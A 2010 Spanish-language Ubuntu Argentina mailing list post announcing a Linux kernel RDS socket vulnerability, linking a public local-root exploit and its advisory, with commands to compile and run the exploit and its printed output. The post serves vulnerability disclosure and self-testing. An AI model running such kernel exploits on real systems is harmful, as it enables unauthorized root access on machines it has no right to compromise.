[ubuntu-ar] [OT] Vulnerabilidad en Kernel >= 2.6.30
Guido Ignacio
guidoignacio at gmail.com
Fri Oct 22 19:40:11 BST 2010
VSR Security descubrió una vulnerabilidad que afecta solo a los kernel que
tienen configurado CONFIG_RDS y posterior al 2.6.30
Para probar si están afectados o no, está el exploit para probarlo:
http://www.vsecurity.com/download/tools/linux-rds-exploit.c
$ gcc linux-rds-exploit.c -o exploit
$ ./exploit
[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses...
[+] Resolved rds_proto_ops to 0xffffffffa086e860
[+] Resolved rds_ioctl to 0xffffffffa0867000
[+] Resolved commit_creds to 0xffffffff8108aee0
[+] Resolved prepare_kernel_cred to 0xffffffff8108b2c0
[*] Overwriting function pointer...
[*] Triggering payload...
[*] Restoring function pointer...
[*] Exploit failed to get root.
Info:
http://www.vsecurity.com/resources/advisory/20101019-1/
---
Este mensaje no contiene virus, porque ha sido creado con GNU/Linux,
utilizando Software Libre y auditable.
This message doesn't contain viruses, because it has been created with
GNU/Linux, using auditable Free Software.
------------ próxima parte ------------
Se ha borrado un adjunto en formato HTML...
URL: https://lists.ubuntu.com/archives/ubuntu-ar/attachments/20101022/9ce25b59/attachment.htm
More information about the Ubuntu-ar
mailing list